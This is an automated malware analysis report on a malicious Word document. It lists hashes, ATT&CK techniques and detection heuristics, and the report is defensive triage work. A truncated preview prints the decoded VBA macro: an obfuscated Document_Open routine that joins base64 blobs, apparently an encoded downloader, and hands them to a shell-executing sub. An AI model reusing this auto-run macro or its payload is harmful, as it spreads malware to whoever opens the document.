Office (OLE) malware analysis — malicious · 586b7dbe2a700e50

MALICIOUS

Office (OLE)

146.0 KB Created: 2018-01-29 21:20:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: bbe3dddc2d39028d1cab797d1b179dea SHA-1: 503c685672008714736fde83dfb5442370888746 SHA-256: 586b7dbe2a700e50a9dda9a9e12bd985e54dc5b1b7a77a61450d638358133d3f

224 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate that the Document_Open macro executes a shell command. This is a common technique for downloading and executing further malicious content. The ClamAV detection also confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Macro.Obfuscation-6332451-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Obfuscation-6332451-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	20761 bytes
SHA-256: `85f225d3a8375e2310673013393266366e3ef58edd2e9bca1e6737da0a043870`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 4 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim etA0gU etA0gU = Array("rQuPYdaX") dJ5HzxO = etA0gU(0) Dim nVIaxv nVIaxv = Array("Ml1M3FX") GhEpx6As = nVIaxv(0) Dim jaUf7 jaUf7 = Array("buRYO") c1mCs = jaUf7(0) SoQg9U = "2YmlrdWRtVnljMmx2Ympza1UxRlplVlVnUFNBbmVGcGxTMFpZSnpza2FtMVdiekpITG1obFlXUmxjbk5iSjNWelpYSXRZV2RsYm5RblhTQTlJQ1JNZVZocVNYVm9SRHNrVGxwV1dIcE9jakFnUFNBbmVXNU5VMG9uT3lSTWVWaHFTWFZvUkM1amJHOXpaU2dwT3lSdFRsSjNUVWh4SUQwZ0oySTROVXRIWkZZMk55YzdKRXg1V0dwSmRXaEVMbkYxYVhRN0pIRmt" GHIq7VTY = "jM2xLSUQwZ0oyaFlWWGRCTjFadkp6c2tTazVqVm1WQ2VHWWdQU0F" Dim yly1vFZ yly1vFZ = Array("WqDivFh42") wra8K = yly1vFZ(0) Dim Ye5AE Ye5AE = SoQg9U & GHIq7VTY BtOMAV3H = "WTIxa0lDOWpJSE5sZENCZllURTljRzkzSmlZZ2MyVjBJRjloTWoxbGNuTm9KaVlnYzJWMElGOWhNejFsYkd3bUppQmpZV3hzSUNWZllURWxKVjloTWlVbFgyRXpKU0FrVlV4cWVraDBWSEp6SUQwZ0oybFNTa3RpYmljN0pHcHRWbTh5UnlBOUlHNWxkeTF2WW1wbFkzUWdVM2x6ZEdWdExrNWxkQzVYWldKRGJHbGxiblE3SkVSVFZFWmtTM2hZTVNBOUlDZHZkR2d4UkVNbk95Uk1" TO1VjM = "lVmhxU1hWb1JDQTlJQ2hPWlhjdFQySnFaV04wSUMxRGIyMVBZbXBsWTNRZ2QyOXlaQzV" va2OGyrnF = "oY0hCc2FXTmhkR2x" Dim Jkx61q Jkx61q = Array("b5uGcAOBr", "RDUad", "NdWN1fbe") pdaquLYp = Jkx61q(2) If Len("ML5Ow") <> 229 Then ' rWxQwBH Else ' AXG4aY MsgBox "l9bMza", 39, "FJg2TFKXR" End If Dim lJg0n5PL4 lJg0n5PL4 = Array("pDCYZztjm", "N8chDR57Y") Pjn9phx = lJg0n5PL4(1) Dim XZwW1z9 XZwW1z9 = BtOMAV3H & TO1VjM & va2OGyrnF P6MsE0 = "VGM0Snk1VGNHeHBkQ2duTENjcEtYdDBjbmw3SkhWV00xSk1aVWw2SUQwZ0ozQk5VRFppUzJSSFFTYzdKR3B0Vm04eVJ5NUViM2R1Ykc5aFpFWnBiR1VvSkcxQ1lsSnBaRmQxTGxSdlUzUnlhVzVuS0Nrc0lDUktUbU5XWlVKNFppazdKRWhtVm5sQmQzUWdQU0FuUkRGSWVFZExPRlFuTzFOMFlYSjBMVkJ5YjJObGMzTWdKRXBPWTFabFFuaG1PeVJEZGpNeFlYTm9SU0E5SUNkU1RIQkhNR1JzTWljN1luSmxZV3M3ZldOaGRHTm9leVJNYkZnMFJ5QTlJQ2R4U1hC" P0d3DV9 = "eFRGSlFNeWM3ZlNSeFUwczJkRVJWSUQwZ0oyWk5XVFJrUm1OS0p6dDk=" Dim GqWEC8j GqWEC8j = Array("iLC6A", "mazqZ", "r5MTUpeL") dgvGs = GqWEC8j(2) Dim ZrRwaGP2U ZrRwaGP2U = P6MsE0 & P0d3DV9 S7xujfH4w = "rWlc1Mk9uUmxiWEFnS3lBblhERTVPVGd5TG1WNFpTYzdKRXRXVW1wa09Ga2dQU0FuUnpsWGFtVkdWQ2M3Wm05eVpXRmphQ2drYlVKaVVtbGtWM1VnYVc0Z0oyaDBkSEE2THk5M2FXcGtjWGRpYm5SMWNYZGxZbkYzWlhGM2FYcDRZeTVqYjIwdmMzUmhkR0V2YVc1a1pYZ3VjR2h3UDNK" Y0SHNv = "dVpEMDFPVGszT0N3L2NtNWtQVFU1T1RjNExEOXlibVE5TlRrNU56Z3NQM0p1WkQwMU9UazNPQ3cvY201a1BUVTVP" If Len("UXDyUWbL") <> 235 Then ' ZmfzTIwHP Else ' aCNBy MsgBox "svauP07p", 32, "UTm8XPe4" End If If Len("jOLsBU") <> 198 Then ' e739s1S Else ' mtW4zAjo MsgBox "tBpWKmXj", 33, "XoyJR1XfN" End If Dim ULsAq ULsAq = Array("JWTSk3U", "LWK1ncyN", "Umvj7") feEQTy = ULsAq(1) Dim fow6Ead5 fow6Ead5 = S7xujfH4w & Y0SHNv Dim EHCumV EHCumV = Array("RHAln6v", "hUve8xZNh", "g8pnKLxm0") XOzCxTMU = EHCumV(1) Dim H45fok2JV H45fok2JV = Array("eyI1oYxJ", "hIjzTf", "sYLulAKws") us6Lo7O0e = H45fok2JV(0) Dim O5Cqm O5Cqm = Array("wywON8V2", "FuWi2OYa0") xwglNU = O5Cqm(1) SXnQ3LURm = XZwW1z9 & Ye5AE & fow6Ead5 & ZrRwaGP2U Dim Ad2qrK Ad2qrK = Array("Pe36BuVCt") qK1ZJI = Ad2qrK(0) Dim eQdC1K eQdC1K = Array("ZcE3I", "opdOj", "ayaTrxP") xwKuE = eQdC1K(0) Dim jwinf jwinf = Array("usn2WgkNl", "gMXiDT4u") y6t3UH1s4 = jwinf(0) sex SXnQ3LURm End Sub Attribute VB_Name = "Wct7kKdi5" Sub sex(r2IPVpJ78) Dim kiayC2Sv kiayC2Sv = Array("rZdLP7T") kpDbon = kiayC2Sv(0) Dim ATrLRBCDq ATrLRBCDq = Array("HzDBP", "Mhifrg") cwA3qQ = ATrLRBCDq(1) Dim D9DcAZMU D9DcAZMU = Array("ApaleGHm", "SR34vy", "y2B91iG") oWyZ1aPK = D9DcAZMU(2) Dim esA4u15 esA4u15 = Array("chWScte", "ys3bxTDM") M13ASVE = esA4u15(0) Dim eJMKFmetv eJMKFmetv = Array("vi51ks") hHnhGwXC = eJMKFmetv(0) Dim C42dwpqi C42dwpqi = Array("APaAde40", "t8eGLHt") B2qwfc5vj = C42dwpqi(1) Dim bf8Hsay bf8Hsay = Array("e40b1J7NO", "g8lzp05vO") rAtwI4SJ = bf8Hsay(0) If Len("zWhckp") <> 252 Then ' W26ylA Else ' ULsno MsgBox "WzqakAc5u", 63, "dyTgBMbr" E ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.